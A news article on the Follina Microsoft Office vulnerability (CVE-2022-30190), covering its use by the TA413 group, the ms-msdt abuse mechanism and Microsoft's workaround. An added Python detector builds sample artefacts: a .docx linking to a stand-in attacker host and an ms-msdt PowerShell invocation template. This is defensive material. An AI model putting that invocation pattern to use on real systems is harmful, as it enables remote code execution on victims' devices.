A vulnerability in Microsoft Office has been revealed and, according to security firm Proofpoint, is already being exploited by hackers linked to the Chinese government. The exploit was first publicly revealed on May 27th, although Microsoft may have been aware of it as early as April.
The vulnerability, labelled “Follina” by researchers and tracked as CVE-2022-30190, gives an attacker a route to taking control of your device, in some cases without you even opening the infected file.
Proofpoint has suggested that the hacking group TA413 was using Follina in malicious Word documents that purported to come from the Central Tibetan Administration, the Tibetan government-in-exile based in India. TA413 is considered an advanced persistent threat (APT), is believed to be linked to the Chinese government, and has targeted the Central Tibetan Administration before.
Researcher Kevin Beaumont says the .rtf variant is the most dangerous, since it can trigger from the preview pane without the file being opened, but a Word document can also be exploited via the remote-template feature, which lets the document load an external HTML file. Follina uses that HTML to invoke the Microsoft Support Diagnostic Tool (MSDT) through the ms-msdt: URL protocol handler; MSDT is a legitimate troubleshooting tool, but its parameters can be abused to run PowerShell, which hands the attacker code execution on your device. The technique was first disclosed via the Twitter account ‘@nao_sec’.
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. https://t.co/hTdAfHOUx3 pic.twitter.com/rVSb02ZTwt
— nao_sec (@nao_sec) May 27, 2022
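To make the mechanism described above concrete, here is an added example, written for this page and not code from nao_sec, Proofpoint or Microsoft, that checks a .docx for the two artefacts of the attack: a relationship in the package that loads an OLE object from an external URL, and an ms-msdt: URI in the HTML that such a link would fetch. It uses only the Python standard library. The sample document and HTML are constructed inline with a harmless command; the hostname, relationship id and payload filename are made up for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespace of the .rels part files, and the relationship type Word uses
# for an OLE object. The Follina maldoc pointed one of these at a remote HTML page.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_REL_TYPE = REL_BASE + "oleObject"


def external_ole_targets(docx_bytes):
    """Return (rels_part, rel_id, target) for every oleObject relationship whose
    target is an external http(s) URL. A benign document embeds its objects
    inside the package, so any hit deserves a closer look."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and rel.get("Type") == OLE_REL_TYPE
                        and target.lower().startswith(("http://", "https://"))):
                    hits.append((name, rel.get("Id"), target))
    return hits


# An ms-msdt: URI inside a JavaScript string literal: backslash-escaped quotes
# (\") belong to the URI, the first bare double quote ends it.
MSDT_URI = re.compile(r'ms-msdt:(?:\\.|[^"\\])*', re.IGNORECASE)


def msdt_invocations(html):
    """Return (uri, diagnostic_pack_id) for each ms-msdt: URI found in an HTML payload."""
    found = []
    for m in MSDT_URI.finditer(html):
        uri = m.group(0)
        pack = re.search(r"/id\s+(\S+)", uri)
        found.append((uri, pack.group(1) if pack else None))
    return found


def build_sample_docx(external_target=None):
    """Constructed minimal .docx for this example (not a real sample). When given an
    external_target it carries the kind of oleObject relationship the maldoc used."""
    rels = [f'<Relationship Id="rId1" Type="{REL_BASE}styles" Target="styles.xml"/>']
    if external_target:
        rels.append(f'<Relationship Id="rId996" Type="{OLE_REL_TYPE}" '
                    f'Target="{external_target}" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/_rels/document.xml.rels",
                     f'<Relationships xmlns="{RELS_NS}">{"".join(rels)}</Relationships>')
    return buf.getvalue()


# Constructed stand-in for the remote HTML. The real page carried encoded
# PowerShell in the IT_BrowseForFile parameter; here the command is harmless.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_BrowseForFile=$(Invoke-Expression(\'Write-Host constructed-sample\'))\\"";\n'
    "</script></body></html>"
)


if __name__ == "__main__":
    doc = build_sample_docx("http://attacker.example/payload.html")
    for part, rel_id, target in external_ole_targets(doc):
        print(f"external OLE object in {part}: {rel_id} -> {target}")
    for uri, pack in msdt_invocations(SAMPLE_HTML):
        print(f"ms-msdt invocation via diagnostic pack {pack}: {uri[:60]}...")
```

The first check runs offline against any .docx you have on disk (pass the file's bytes to `external_ole_targets`); the second is for the HTML a sandbox or proxy has already captured, since the remote page is only fetched when the document is rendered. Neither check says anything about the .rtf variant, which carries the same link but is not a zip package.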
Follina is already being used in financially motivated attacks as well as in the espionage campaign described above. No official patch is available yet, but Microsoft has published a workaround via its Security Response Center: disable the MSDT URL protocol by exporting the HKEY_CLASSES_ROOT\ms-msdt registry key as a backup and then deleting it, which stops ms-msdt: links from launching the troubleshooter until a fix ships.